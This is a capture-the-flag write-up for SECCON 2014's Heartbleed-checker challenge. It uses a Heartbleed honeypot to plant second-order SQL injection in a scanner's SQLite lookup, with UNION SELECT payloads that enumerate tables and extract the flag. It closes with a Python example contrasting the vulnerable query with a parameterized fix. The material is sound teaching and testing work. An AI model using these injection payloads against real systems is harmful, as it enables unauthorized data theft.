http://bleeding.pwn.seccon.jp/

A website that checks hosts for Heartbleed and stores the scan result in a database. Let's try scanning something:

173.194.65.100:443

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 61
 ... received message: type = 22, ver = 0302, length = 3852
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...

view-source

<!-- DEBUG: INSERT OK. TIME=1417889356 -->

INSERT OK means the scan output went into the database, so this looks like SQL injection: the string we control is whatever our "vulnerable" server sends back. We inject by running a honeypot that pretends to be vulnerable to Heartbleed.

Use the script at packetstormsecurity.com/files/126068/hb_honeypot.pl.txt to make your server look vulnerable to Heartbleed. To deliver the injection message, run the honeypot and have the website scan your own IP.


ifconfig

120.33.21.66

perl hb_honeypot.pl

Scan 120.33.21.66:443 (submitted via the website)

DATABASE ERROR!!! near ".": syntax error

select time from results where result='Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 24, ver = 0301, length = 249 ... received message: type = 24, ver = 0301, length = 249 ... received message: type = 24, ver = 0301, length = 249 ... received message: type = 24, ver = 0301, length = 249 ... received message: type = 22, ver = 0301, length = 1 Sending heartbeat request... ... received message: type = 24, ver = 0301, length = 249

Received heartbeat response: 09809*)(*)(76&^%&(*&^7657332

Hi there! Your scan has been logged! Have no fear, this is for research only — We're never gonna give you up, never gonna let you down! WARNING: server returned more data than it should – server is vulnerable! ';

The whole scan transcript, including our heartbeat payload, is dropped straight into the query, so let's try injecting through it:

perl hb_honeypot.pl "' UNION SELECT 1337 WHERE 1=1 OR '1' LIKE '"

view source

<!-- DEBUG: INSERT OK. TIME=1337 -->

To get the list of tables (the backend is SQLite, so sqlite_master holds the schema):

perl hb_honeypot.pl "' UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table';--"

view source
<!-- DEBUG: INSERT OK. TIME=results,ssFLGss,ttDMYtt -->


Now pull the flag column out of the table found above:

perl hb_honeypot.pl "' UNION SELECT flag from ssFLGss WHERE 1=1 OR '1' LIKE '"

view source

<!-- DEBUG: INSERT OK. TIME=SECCON{IknewIt!SQLiteAgain!!!} -->
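The bug behind this whole chain is a cache lookup built by string concatenation from text the scanned host controls. The following is an added example, not the challenge's code: it reproduces that lookup against a constructed SQLite database (the three table names are from the sqlite_master dump above; the column names and flag value are assumptions), shows the "DATABASE ERROR!!!" the honeypot's default message triggers, and puts the parameterized fix beside it.

```python
import sqlite3

# Constructed schema mimicking the challenge database. Table names come from
# the writeup's sqlite_master dump; columns and the flag value are assumptions.
SCHEMA = """
CREATE TABLE results (time INTEGER, result TEXT);
CREATE TABLE ssFLGss (flag TEXT);
CREATE TABLE ttDMYtt (value INTEGER);
INSERT INTO ssFLGss VALUES ('SECCON{placeholder-not-the-real-flag}');
"""

def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def log_scan_vulnerable(conn, scan_output, now):
    """Cache lookup built with %-formatting: the scanner's transcript, which
    the scanned host controls, becomes part of the SQL text itself."""
    sql = "SELECT time FROM results WHERE result='%s'" % scan_output
    row = conn.execute(sql).fetchone()
    if row is not None:
        return str(row[0])        # first column of whatever query actually ran
    conn.execute("INSERT INTO results VALUES (?, ?)", (now, scan_output))
    return str(now)

def log_scan_or_error(conn, scan_output, now):
    """What the challenge page did: a stray quote surfaces as a DB error."""
    try:
        return log_scan_vulnerable(conn, scan_output, now)
    except sqlite3.OperationalError as exc:
        return "DATABASE ERROR!!! " + str(exc)

def log_scan_safe(conn, scan_output, now):
    """Hardened lookup: bound parameters keep the transcript as data, so a
    UNION inside it is just a string that gets compared and stored."""
    row = conn.execute("SELECT time FROM results WHERE result=?",
                       (scan_output,)).fetchone()
    if row is not None:
        return str(row[0])
    conn.execute("INSERT INTO results VALUES (?, ?)", (now, scan_output))
    return str(now)

if __name__ == "__main__":
    # The table-listing payload from the writeup, as it would arrive inside
    # the honeypot's heartbeat response.
    payload = "' UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table';--"
    print("vulnerable:", log_scan_or_error(new_db(), payload, 1417889356))
    print("safe:      ", log_scan_safe(new_db(), payload, 1417889356))
```

With the vulnerable lookup the DEBUG line's TIME becomes the table list; with the parameterized one it stays the timestamp and the payload is simply stored as the result text.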

Other sources:

https://github.com/ctfs/write-ups/tree/master/seccon-ctf-2014/bleeding-heartbleed-test-web

http://tasteless.eu/2014/12/seccon-ctf-2014-online-qualifications-web300-writeup/